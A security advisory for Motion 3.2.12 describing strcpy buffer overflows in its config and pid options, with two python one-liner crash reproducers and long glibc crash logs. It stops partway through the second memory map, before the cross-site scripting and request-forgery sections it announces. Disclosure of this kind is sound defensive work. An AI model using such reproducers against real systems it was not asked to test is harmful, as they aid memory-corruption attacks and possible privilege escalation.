Motion - Bug Report 2013x 03x 07x 071831

BUG: Multiple Vulnerabilities

Motion 3.2.12 is prone to multiple vulnerabilities. These vulnerabilities are Buffer Overflows, Cross Site Scripting and Cross Site Request Forgery.

Buffer Overflows:

Supplying a long filename to the config and pid parameters of the "motion" binary will result in a buffer overflow. The cause of this is, is the unsafe C function strcpy() where no boundary checking is done to prevent overflowing the buffer.
This in theory could be abused to escalate privileges if the suid/sgid flag is set on the motion binary (not default on most operating systems as far as I know)
Below how to replicate the bugs:

# motion -c `python -c 'print "\x41"*1000'`
*** buffer overflow detected ***: motion terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x45)[0xb6876045]
/lib/i386-linux-gnu/libc.so.6(+0x102e1a)[0xb6874e1a]
/lib/i386-linux-gnu/libc.so.6(+0x10227f)[0xb687427f]
motion[0x804c0bb]
motion[0x8050e95]
motion[0x804c624]
motion[0x804aff6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb678b4d3]
motion[0x804b761]
======= Memory map: ========
08048000-0807c000 r-xp 00000000 08:11 13111448 /usr/bin/motion
0807c000-0807d000 r--p 00033000 08:11 13111448 /usr/bin/motion
0807d000-08080000 rw-p 00034000 08:11 13111448 /usr/bin/motion
08080000-080a5000 rw-p 00000000 00:00 0
0981e000-0983f000 rw-p 00000000 00:00 0 [heap]
b5a4f000-b5a53000 rw-p 00000000 00:00 0
b5a53000-b5a5b000 r-xp 00000000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5a5b000-b5a5c000 r--p 00007000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5a5c000-b5a5d000 rw-p 00008000 08:11 12719664 /lib/i386-linux-gnu/libcrypt-2.15.so
b5a5d000-b5a84000 rw-p 00000000 00:00 0
b5a84000-b5b26000 r-xp 00000000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b26000-b5b27000 r--p 000a2000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b27000-b5b28000 rw-p 000a3000 08:11 13108909 /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b28000-b5b29000 rw-p 00000000 00:00 0
b5b29000-b5b6c000 r-xp 00000000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5b6c000-b5b6d000 ---p 00043000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5b6d000-b5b6e000 r--p 00043000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5b6e000-b5b70000 rw-p 00044000 08:11 13108907 /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5b70000-b5b7d000 r-xp 00000000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5b7d000-b5b7e000 r--p 0000c000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5b7e000-b5b7f000 rw-p 0000d000 08:11 13108903 /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5b7f000-b5b80000 rw-p 00000000 00:00 0
b5b80000-b5ba7000 r-xp 00000000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5ba7000-b5ba8000 r--p 00027000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5ba8000-b5ba9000 rw-p 00028000 08:11 13108905 /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5ba9000-b5bac000 r-xp 00000000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5bac000-b5bad000 r--p 00002000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5bad000-b5bae000 rw-p 00003000 08:11 12714896 /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5bae000-b5bbe000 r-xp 00000000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5bbe000-b5bbf000 r--p 0000f000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5bbf000-b5bc0000 rw-p 00010000 08:11 13111180 /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5bc0000-b5bd0000 r-xp 00000000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5bd0000-b5bd1000 r--p 0000f000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5bd1000-b5bd2000 rw-p 00010000 08:11 13111207 /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5bd2000-b5be6000 r-xp 00000000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5be6000-b5be7000 r--p 00013000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5be7000-b5be8000 rw-p 00014000 08:11 13108877 /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5be8000-b5be9000 rw-p 00000000 00:00 0
b5be9000-b5c1b000 r-xp 00000000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c1b000-b5c1c000 r--p 00032000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c1c000-b5c1d000 rw-p 00033000 08:11 13108881 /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c1d000-b5c1e000 rw-p 00000000 00:00 0
b5c1e000-b5cbe000 r-xp 00000000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5cbe000-b5cbf000 ---p 000a0000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5cbf000-b5cc0000 r--p 000a0000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5cc0000-b5cc3000 rw-p 000a1000 08:11 13108879 /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5cc3000-b5d42000 r-xp 00000000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d42000-b5d44000 r--p 0007e000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d44000-b5d46000 rw-p 00080000 08:11 13108911 /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d46000-b5d4c000 r-xp 00000000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5d4c000-b5d4d000 r--p 00005000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5d4d000-b5d4e000 rw-p 00006000 08:11 13108913 /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5d4e000-b5dd0000 r-xp 00000000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5dd0000-b5dd1000 r--p 00081000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5dd1000-b5dd3000 rw-p 00082000 08:11 12714905 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5dd3000-b5dd4000 rw-p 00000000 00:00 0
b5dd4000-b5e93000 r-xp 00000000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5e93000-b5e97000 r--p 000be000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5e97000-b5e98000 rw-p 000c2000 08:11 13109922 /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5e98000-b5ed2000 r-xp 00000000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5ed2000-b5ed3000 r--p 00039000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5ed3000-b5ed5000 rw-p 0003a000 08:11 13108915 /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5ed5000-b5eef000 r-xp 00000000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5eef000-b5ef0000 r--p 00019000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5ef0000-b5ef1000 rw-p 0001a000 08:11 13107884 /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5ef1000-b5efe000 r-xp 00000000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5efe000-b5eff000 r--p 0000c000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5eff000-b5f00000 rw-p 0000d000 08:11 13107938 /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5f00000-b5f13000 r-xp 00000000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f13000-b5f14000 ---p 00013000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f14000-b5f15000 r--p 00013000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f15000-b5f16000 rw-p 00014000 08:11 12719668 /lib/i386-linux-gnu/libresolv-2.15.so
b5f16000-b5f19000 rw-p 00000000 00:00 0
b5f19000-b5f1b000 r-xp 00000000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f1b000-b5f1c000 r--p 00002000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f1c000-b5f1d000 rw-p 00003000 08:11 12714027 /lib/i386-linux-gnu/libkeyutils.so.1.4
b5f1d000-b5f24000 r-xp 00000000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f24000-b5f25000 r--p 00006000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f25000-b5f26000 rw-p 00007000 08:11 13108893 /usr/lib/i386-linux-gnu/libkrb5support.so.0.1
b5f26000-b5f4c000 r-xp 00000000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5f4c000-b5f4d000 r--p 00025000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5f4d000-b5f4e000 rw-p 00026000 08:11 13108889 /usr/lib/i386-linux-gnu/libk5crypto.so.3.1
b5f4e000-b5f51000 r-xp 00000000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5f51000-b5f52000 r--p 00002000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5f52000-b5f53000 rw-p 00003000 08:11 12719678 /lib/i386-linux-gnu/libdl-2.15.so
b5f53000-b5f6f000 r-xp 00000000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5f6f000-b5f70000 r--p 0001b000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5f70000-b5f71000 rw-p 0001c000 08:11 12714074 /lib/i386-linux-gnu/libgcc_s.so.1
b5f71000-b5f72000 rw-p 00000000 00:00 0
b5f72000-b5ffd000 r-xp 00000000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b5ffd000-b5ffe000 r--p 0008a000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b5ffe000-b6002000 rw-p 0008b000 08:11 13109480 /usr/lib/i386-linux-gnu/liborc-0.4.so.0.16.0
b6002000-b6008000 r-xp 00000000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6008000-b6009000 r--p 00005000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b6009000-b600a000 rw-p 00006000 08:11 13111258 /usr/lib/i386-linux-gnu/libogg.so.0.7.1
b600a000-b6058000 r-xp 00000000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b6058000-b6059000 ---p 0004e000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b6059000-b605a000 r--p 0004e000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b605a000-b605b000 rw-p 0004f000 08:11 13107929 /usr/lib/i386-linux-gnu/libldap_r-2.4.so.2.8.1
b605b000-b605c000 rw-p 00000000 00:00 0
b605c000-b6097000 r-xp 00000000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b6097000-b6098000 ---p 0003b000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b6098000-b6099000 r--p 0003b000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b6099000-b609a000 rw-p 0003c000 08:11 13107517 /usr/lib/i386-linux-gnu/libgssapi_krb5.so.2.2
b609a000-b609d000 r-xp 00000000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b609d000-b609e000 r--p 00002000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b609e000-b609f000 rw-p 00003000 08:11 12714018 /lib/i386-linux-gnu/libcom_err.so.2.1
b609f000-b60a0000 rw-p 00000000 00:00 0
b60a0000-b6168000 r-xp 00000000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b6168000-b616e000 r--p 000c7000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b616e000-b616f000 rw-p 000cd000 08:11 13108891 /usr/lib/i386-linux-gnu/libkrb5.so.3.3
b616f000-b6301000 r-xp 00000000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6301000-b6310000 r--p 00192000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6310000-b6317000 rw-p 001a1000 08:11 12714013 /lib/i386-linux-gnu/libcrypto.so.1.0.0
b6317000-b631a000 rw-p 00000000 00:00 0
b631a000-b6369000 r-xp 00000000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b6369000-b636a000 ---p 0004f000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b636a000-b636c000 r--p 0004f000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b636c000-b6370000 rw-p 00051000 08:11 12714014 /lib/i386-linux-gnu/libssl.so.1.0.0
b6370000-b6380000 r-xp 00000000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b6380000-b6381000 r--p 0000f000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b6381000-b6382000 rw-p 00010000 08:11 13107507 /usr/lib/i386-linux-gnu/libva.so.1.3200.0
b6382000-b6386000 rw-p 00000000 00:00 0
b6386000-b6392000 r-xp 00000000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b6392000-b6393000 r--p 0000b000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b6393000-b6394000 rw-p 0000c000 08:11 13107504 /usr/lib/libgsm.so.1.0.12
b6394000-b6395000 rw-p 00000000 00:00 0
b6395000-b6450000 r-xp 00000000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b6450000-b6452000 r--p 000ba000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b6452000-b6453000 rw-p 000bc000 08:11 13107498 /usr/lib/libschroedinger-1.0.so.0.11.0
b6453000-b6472000 r-xp 00000000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b6472000-b6473000 r--p 0001e000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b6473000-b6474000 rw-p 0001f000 08:11 13109963 /usr/lib/i386-linux-gnu/sse2/libspeex.so.1.5.0
b6474000-b648f000 r-xp 00000000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b648f000-b6490000 r--p 0001a000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b6490000-b6491000 rw-p 0001b000 08:11 13110244 /usr/lib/i386-linux-gnu/libtheoradec.so.1.1.4
b6491000-b64d0000 r-xp 00000000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b64d0000-b64d1000 r--p 0003f000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b64d1000-b64d2000 rw-p 00040000 08:11 13110245 /usr/lib/i386-linux-gnu/libtheoraenc.so.1.1.2
b64d2000-b64fb000 r-xp 00000000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b64fb000-b64fc000 r--p 00028000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b64fc000-b64fd000 rw-p 00029000 08:11 13109670 /usr/lib/i386-linux-gnu/libvorbis.so.0.4.5
b64fd000-b64fe000 rw-p 00000000 00:00 0
b64fe000-b6664000 r-xp 00000000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b6664000-b6675000 r--p 00165000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b6675000-b6676000 rw-p 00176000 08:11 13109643 /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.8
b6676000-b6712000 r-xp 00000000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b6712000-b6713000 r--p 0009c000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b6713000-b6714000 rw-p 0009d000 08:11 13110019 /usr/lib/libvpx.so.1.0.0
b6714000-b671e000 rw-p 00000000 00:00 0
b671e000-b6732000 r-xp 00000000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b6732000-b6733000 r--p 00013000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b6733000-b6734000 rw-p 00014000 08:11 12714015 /lib/i386-linux-gnu/libz.so.1.2.3.4
b6734000-b6743000 r-xp 00000000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b6743000-b6744000 r--p 0000e000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b6744000-b6745000 rw-p 0000f000 08:11 12714930 /lib/i386-linux-gnu/libbz2.so.1.0.4
b6745000-b676f000 r-xp 00000000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b676f000-b6770000 r--p 00029000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b6770000-b6771000 rw-p 0002a000 08:11 12719674 /lib/i386-linux-gnu/libm-2.15.so
b6771000-b6772000 rw-p 00000000 00:00 0
b6772000-b6915000 r-xp 00000000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6915000-b6916000 ---p 001a3000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6916000-b6918000 r--p 001a3000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6918000-b6919000 rw-p 001a5000 08:11 12719663 /lib/i386-linux-gnu/libc-2.15.so
b6919000-b691c000 rw-p 00000000 00:00 0
b691c000-b6943000 r-xp 00000000 08:11 13107298 /usr/lib/libpq.so.5.4
b6943000-b6944000 r--p 00027000 08:11 13107298 /usr/lib/libpq.so.5.4
b6944000-b6945000 rw-p 00028000 08:11 13107298 /usr/lib/libpq.so.5.4
b6945000-b6962000 r-xp 00000000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b6962000-b6963000 r--p 0001c000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b6963000-b6964000 rw-p 0001d000 08:11 13241057 /usr/lib/i386-linux-gnu/i686/cmov/libavutil.so.51.22.1
b6964000-b6967000 rw-p 00000000 00:00 0
b6967000-b7045000 r-xp 00000000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b7045000-b7046000 r--p 006de000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b7046000-b7055000 rw-p 006df000 08:11 13243408 /usr/lib/i386-linux-gnu/i686/cmov/libavcodec.so.53.35.0
b7055000-b75c3000 rw-p 00000000 00:00 0
b75c3000-b76d0000 r-xp 00000000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b76d0000-b76d1000 r--p 0010c000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b76d1000-b76d9000 rw-p 0010d000 08:11 13243406 /usr/lib/i386-linux-gnu/i686/cmov/libavformat.so.53.21.1
b76d9000-b76da000 rw-p 00000000 00:00 0
b76da000-b76fc000 r-xp 00000000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b76fc000-b76fd000 r--p 00022000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b76fd000-b76fe000 rw-p 00023000 08:11 13108788 /usr/lib/i386-linux-gnu/libjpeg.so.62.0.0
b76fe000-b7715000 r-xp 00000000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b7715000-b7716000 r--p 00016000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b7716000-b7717000 rw-p 00017000 08:11 12719672 /lib/i386-linux-gnu/libpthread-2.15.so
b7717000-b7719000 rw-p 00000000 00:00 0
b7726000-b7729000 rw-p 00000000 00:00 0
b7729000-b772a000 r-xp 00000000 00:00 0 [vdso]
b772a000-b774a000 r-xp 00000000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
b774a000-b774b000 r--p 0001f000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
b774b000-b774c000 rw-p 00020000 08:11 12719675 /lib/i386-linux-gnu/ld-2.15.so
bfbb6000-bfbd7000 rw-p 00000000 00:00 0 [stack]
Aborted



# motion -p /tmp/`python -c 'print "\x41"*5000'`
*** buffer overflow detected ***: motion terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x45)[0xb68cf045]
/lib/i386-linux-gnu/libc.so.6(+0x102e1a)[0xb68cde1a]
/lib/i386-linux-gnu/libc.so.6(+0x10214d)[0xb68cd14d]
motion[0x805012b]
motion[0x8050c00]
motion[0x804c624]
motion[0x804aff6]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf3)[0xb67e44d3]
motion[0x804b761]
======= Memory map: ========
08048000-0807c000 r-xp 00000000 08:11 13111448   /usr/bin/motion
0807c000-0807d000 r--p 00033000 08:11 13111448   /usr/bin/motion
0807d000-08080000 rw-p 00034000 08:11 13111448   /usr/bin/motion
08080000-080a5000 rw-p 00000000 00:00 0
082bf000-082e0000 rw-p 00000000 00:00 0          [heap]
b5aa8000-b5aac000 rw-p 00000000 00:00 0
b5aac000-b5ab4000 r-xp 00000000 08:11 12719664   /lib/i386-linux-gnu/libcrypt-2.15.so
b5ab4000-b5ab5000 r--p 00007000 08:11 12719664   /lib/i386-linux-gnu/libcrypt-2.15.so
b5ab5000-b5ab6000 rw-p 00008000 08:11 12719664   /lib/i386-linux-gnu/libcrypt-2.15.so
b5ab6000-b5add000 rw-p 00000000 00:00 0
b5add000-b5b7f000 r-xp 00000000 08:11 13108909   /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b7f000-b5b80000 r--p 000a2000 08:11 13108909   /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b80000-b5b81000 rw-p 000a3000 08:11 13108909   /usr/lib/i386-linux-gnu/libsqlite3.so.0.8.6
b5b81000-b5b82000 rw-p 00000000 00:00 0
b5b82000-b5bc5000 r-xp 00000000 08:11 13108907   /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5bc5000-b5bc6000 ---p 00043000 08:11 13108907   /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5bc6000-b5bc7000 r--p 00043000 08:11 13108907   /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5bc7000-b5bc9000 rw-p 00044000 08:11 13108907   /usr/lib/i386-linux-gnu/libhx509.so.5.0.0
b5bc9000-b5bd6000 r-xp 00000000 08:11 13108903   /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5bd6000-b5bd7000 r--p 0000c000 08:11 13108903   /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5bd7000-b5bd8000 rw-p 0000d000 08:11 13108903   /usr/lib/i386-linux-gnu/libheimbase.so.1.0.0
b5bd8000-b5bd9000 rw-p 00000000 00:00 0
b5bd9000-b5c00000 r-xp 00000000 08:11 13108905   /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5c00000-b5c01000 r--p 00027000 08:11 13108905   /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5c01000-b5c02000 rw-p 00028000 08:11 13108905   /usr/lib/i386-linux-gnu/libwind.so.0.0.0
b5c02000-b5c05000 r-xp 00000000 08:11 12714896   /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5c05000-b5c06000 r--p 00002000 08:11 12714896   /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5c06000-b5c07000 rw-p 00003000 08:11 12714896   /lib/i386-linux-gnu/libgpg-error.so.0.8.0
b5c07000-b5c17000 r-xp 00000000 08:11 13111180   /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5c17000-b5c18000 r--p 0000f000 08:11 13111180   /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5c18000-b5c19000 rw-p 00010000 08:11 13111180   /usr/lib/i386-linux-gnu/libp11-kit.so.0.0.0
b5c19000-b5c29000 r-xp 00000000 08:11 13111207   /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5c29000-b5c2a000 r--p 0000f000 08:11 13111207   /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5c2a000-b5c2b000 rw-p 00010000 08:11 13111207   /usr/lib/i386-linux-gnu/libtasn1.so.3.1.12
b5c2b000-b5c3f000 r-xp 00000000 08:11 13108877   /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5c3f000-b5c40000 r--p 00013000 08:11 13108877   /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5c40000-b5c41000 rw-p 00014000 08:11 13108877   /usr/lib/i386-linux-gnu/libroken.so.18.1.0
b5c41000-b5c42000 rw-p 00000000 00:00 0
b5c42000-b5c74000 r-xp 00000000 08:11 13108881   /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c74000-b5c75000 r--p 00032000 08:11 13108881   /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c75000-b5c76000 rw-p 00033000 08:11 13108881   /usr/lib/i386-linux-gnu/libhcrypto.so.4.1.0
b5c76000-b5c77000 rw-p 00000000 00:00 0
b5c77000-b5d17000 r-xp 00000000 08:11 13108879   /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5d17000-b5d18000 ---p 000a0000 08:11 13108879   /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5d18000-b5d19000 r--p 000a0000 08:11 13108879   /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5d19000-b5d1c000 rw-p 000a1000 08:11 13108879   /usr/lib/i386-linux-gnu/libasn1.so.8.0.0
b5d1c000-b5d9b000 r-xp 00000000 08:11 13108911   /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d9b000-b5d9d000 r--p 0007e000 08:11 13108911   /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d9d000-b5d9f000 rw-p 00080000 08:11 13108911   /usr/lib/i386-linux-gnu/libkrb5.so.26.0.0
b5d9f000-b5da5000 r-xp 00000000 08:11 13108913   /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5da5000-b5da6000 r--p 00005000 08:11 13108913   /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5da6000-b5da7000 rw-p 00006000 08:11 13108913   /usr/lib/i386-linux-gnu/libheimntlm.so.0.1.0
b5da7000-b5e29000 r-xp 00000000 08:11 12714905   /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5e29000-b5e2a000 r--p 00081000 08:11 12714905   /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5e2a000-b5e2c000 rw-p 00082000 08:11 12714905   /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b5e2c000-b5e2d000 rw-p 00000000 00:00 0
b5e2d000-b5eec000 r-xp 00000000 08:11 13109922   /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5eec000-b5ef0000 r--p 000be000 08:11 13109922   /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5ef0000-b5ef1000 rw-p 000c2000 08:11 13109922   /usr/lib/i386-linux-gnu/libgnutls.so.26.21.8
b5ef1000-b5f2b000 r-xp 00000000 08:11 13108915   /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5f2b000-b5f2c000 r--p 00039000 08:11 13108915   /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5f2c000-b5f2e000 rw-p 0003a000 08:11 13108915   /usr/lib/i386-linux-gnu/libgssapi.so.3.0.0
b5f2e000-b5f48000 r-xp 00000000 08:11 13107884   /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5f48000-b5f49000 r--p 00019000 08:11 13107884   /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5f49000-b5f4a000 rw-p 0001a000 08:11 13107884   /usr/lib/i386-linux-gnu/libsasl2.so.2.0.25
b5f4a000-b5f57000 r-xp 00000000 08:11 13107938   /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5f57000-b5f58000 r--p 0000c000 08:11 13107938   /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5f58000-b5f59000 rw-p 0000d000 08:11 13107938   /usr/lib/i386-linux-gnu/liblber-2.4.so.2.8.1
b5f59000-b5f6c000 r-xp 00000000 08:11 12719668   /lib/i386-linux-gnu/libresolv-2.15.so
b5f6c000-b5f6d000 ---p 00013000 08:11 12719668   /lib/i386-linux-gnu/libresolv-2.15.so
b5f6d000-b5f6e000 r--p 00013000 08:11 12719668   /lib/i386-linux-gnu/libresolv-2.15.so
